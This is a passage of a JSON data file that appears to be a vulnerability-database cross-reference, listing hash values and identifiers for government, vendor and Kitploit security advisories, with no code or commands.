"40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "42CCD08061313E58CD6A73C8392806C80452EF564A9B5297EAD78887E47150D7", "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "42EDAFE6D8936EF20A9D2196EA720167F87C6E003FF3677093C777BD76F87321", "4444CE19278AF3B6D6D733CB7C56652494A379ADDF5788A2D704DCF2AF8B12B6", "4490A508C76B3478285658D50CD1591EE7BF09C6C6CB543CD3B4AD02093F6106", "461D38744E2383701381659B3FB9C7655B5271B60CDB145B8DACE60D09C17665", "472B90C1832448CA528B9FB0B6A4E81CAB1388397DE753F5CD640C5D7396EC9B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "4AE1D41640E1E1F9FB5DBE7DBF0EE0C2ACA27C0ECF4C914440CCDB95D27308F5", "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "4C80B96CCF860D1EC965D20D607161A663C8FEDCCC81B5243439A21264518261", "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "4DCA21B56FE99A5E5A697112CA49F4F2144DF92AA26A0776EAADF3EDAC9C9053", "4E45A4CCE496D5E81C322B32A8275068E422B799EBDE7BAED299E58F52295C89", "4E7048D2949BF25810D29EF0126BEB63CEE9FB2EFA940D8D15F1A2EA9579215D", "4E77D6807CCB5F39F0079A9612FD44F47C18AEBAF1D9AA7EBBCB816C3FD025B9", "4EADDF94DBE666E2A4821F37D1326BE41E94E92E6E6B1A8834D7F3C47C803887", "4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "4FB8B888437D1D3BA8267655720E593D70AA3798247EDD900F18FB420753B17B", "4FBB5FAC2DC58E004CD52875DF4CDC0625DBFB20A2AD61A597C719C2C2B0ECAE", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "548C926066F6AD2176268ED770911E39A8F8EF2D79582E0A4D8DDE7F34549084", "558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "5815FB6A93B31EE44428DCA7206EFD79ECDE693494B2D5F28EA2CF1909915C77", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "5C4285711D841C9680531DE8ADF4E9F871797CE3D4CE7073D4D1B7D69166DABE", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "5DC028B7AB8CCCA9FD3F109B69D7F7AEBDC718A32C0EC71E5693C99FFB06466E", "5E0D2EC541C3D2FE5413DA829783950147FE05FA866060FB6B6B557BC4E00A16", "5E46685CCFDAFEF52C3BC0BE649F5DFE9485392CF7A7733CC64B02CFBA707DF4", "5EB805FBA32A419246DDD86FFCA6C34246C092FCBCD8608B3ABC4B0A77FFDAA2", "5ED570DDC2DC18EDBE3A6F896450F75892C392B6E12D967BD6C8F6E5EB0809E5", "5EE7E4E97581573D0B40454E7851D662668050B8C7587DA918FD85D38B92C2A2", "5F247DF8011234E4C8E9F5DA1233AD5131F7718B99D13FA0E448AB8545E5E6F8", "5F24F58173ED799EACD7F7DC971D2ECB62B80971453D92D5DB9CA708526DE3A8", "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "60679F1EB565A827FBFDD72C9C325755586FDA1F0AC78877A6590DED78230E66", "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "62D22CE7464E30931544D86043D72A241CA4A2ED1A6F28AB59EEDEFFCBBFFAAB", "6305882E456CC7111E361249970AB42E196A23084AAFDDE2E82B0694295074BC", "65B30A5B63DE43E789127C5F5AD2977C7194142636581876B7BA2AE224B6420B", "6741052F2A7BCCF76F84825C9FE706D98BCF279A0C055A783796DC802C323E13", "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "6758FD589A76487DB6421ACF317F7E42F52C2C62336F671B43C2B523483BF57E", "67B2FFD11F790787A36E0394080502A01EE907D975E33ADFF6E931A0E15B05F7", "67D7A2AD6D196C643D91F066E834B1EB9853338990881AE1012D2B5186629622", "67EEDC4E808A4DC3E092C0FD2F6DFB5714B1E7F2E2ECD7CE2F8B2F65F2D2B26F", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6920277579A35875812264472A148A4383E98310C21147950644BE922AD17700", "6A43E45FE98A49A0127D4FD81A7F70BC513609043DDA830926C4CD80286B1A17", "6ADEAF325A5B46B34D6E419B67D91A45C9FD7E4F02587AF0F33D5FF933653E27", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "79B141AAF1C51913A9CB5960F462DFAB85217C7BAD6F6CB8BCD729FACEEEBD51", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB1F0F0AF16A09B88EDDD5E242727A3EF12C793CFCE5ED8C34772D7D40B12CB", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CE7D5A1D0996FFAC3B1D8B653E0D11581F2B40F4522A074649FEF0017143DE02", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4452F8B377A6318D5E140C5FE8BCE8A991964A95AC77F047C30B4542034429F", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F122C27179362A817F8CF31FDC2906DEDD7B8BBEA33D06FFA42180F0625D22E0", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "ICSA-18-107-04", "ICSA-18-107-05", "ICSA-21-077-03", "ICSA-21-119-03", "ICSA-21-133-02", "ICSA-21-147-02", "ICSA-21-245-01", "ICSA-21-334-04", "ICSA-21-357-02", "ICSA-22-034-01", "ICSA-22-256-01", "ICSMA-18-058-02"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:937EDF98C40EFDDA392CC06661F152F0", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:D1F1D344B2FD670184AA4FB99A50BD1B", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA10995", "KLA11024", "KLA11059", "KLA11139", "KLA11664", "KLA11835", "KLA11929", "KLA11931", "KLA12103", "KLA12169", "KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12224", "KLA12277", "KLA12278", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1680589374755422772", "KITPLOIT:232707789076746523", "KITPLOIT:3697667464193804316", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5104415481503400470", 